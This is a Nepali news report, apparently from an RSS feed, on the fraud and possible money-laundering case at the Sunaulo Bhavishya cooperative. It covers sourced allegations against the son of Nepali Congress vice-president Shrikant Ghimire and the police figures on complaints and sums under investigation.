सुनौलो भविष्य सहकारीको यो ठगी काण्डको मुद्दामा सम्पत्ती शुद्धिकरण समेत आकर्षित हुने भएपछि नेपाली काँग्रेसका उपसभापति श्रीकान्त घिमिरेसमेत त्यसमा तानिन सक्ने बलियो सम्भावना रहेको स्रोतले औंल्याएको छ । किनकि, उहाँका सुपुत्र अरुणकान्त घिमिरे सो सहकारीमा लामो समयदेखि आवद्ध हुँदै हालको उपाध्यक्ष हुनुका साथै कम्तिमा ४१ लाख रुपैयाँ अपचलन गरेको स्वीकार गरेको भन्ने सो सहकारीका अन्य सञ्चालकहरूको दावी छ । सम्पत्ती शुद्धिकरणको विद्यमान कानुन अनुसार परिवारको कुनै एक व्यक्ति त्यस्तो (सम्पत्ती शुद्धिकरण) मुद्दामा तानिएको खण्डमा उनी सम्बद्ध परिवार र नातेदार तथा अन्य निकटका व्यक्तिहरू समेतको सम्पत्ती शुद्धिकरण गर्नु पर्ने व्यवस्था रहेको छ । काँग्रेस उपसभापति श्रीकान्त घिमिरे विगतका लामो समयसम्म लमजुङ विद्युत उपभोक्ता संस्थाको अध्यक्ष रहेर त्यो संस्था घाटालाको शृंखला चलाउँदै उक्त संस्था डुवाएको जसको पगरी गुथ्नु भएको व्यक्तित्व समेत हुनुहुन्छ । उहाँको त्यतिबेला पनि सम्पत्ती शुद्धिकरण प्रसङ्ग उठेर पनि शक्तिका आडमा ढाकछोप गर्ने काम भएको थियो । यतिबेला उहाँको समेत सम्पत्ती शुद्धिकरण गरियो भने आश्चर्य नहुने स्रोतले बताएको छ । यसमा जेन– जेड टोलीको भूमिका के कस्तो हुने भन्ने आफूहरूले महत्वका साथ हेरिहेको सो सहकारीका पीडितहरूले बताएका छन् ।
सुनौलो भविष्य सहकारीमा एलेसम्म पीडितहरूले एक करोड ७३ लाख रुपैयाँ दावी गर्दै उजुरी दिएको जिल्ला प्रहरी कार्यालयले जनाएको छ । सो कार्यालयका अनुसार उक्त सहकारीमा छ करोड ७३ लाख रुपैया हिनामिना (ठगी) भएको भन्ने प्रतिवदेनका आधारमा अनुसन्धान चलिरहेको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=361180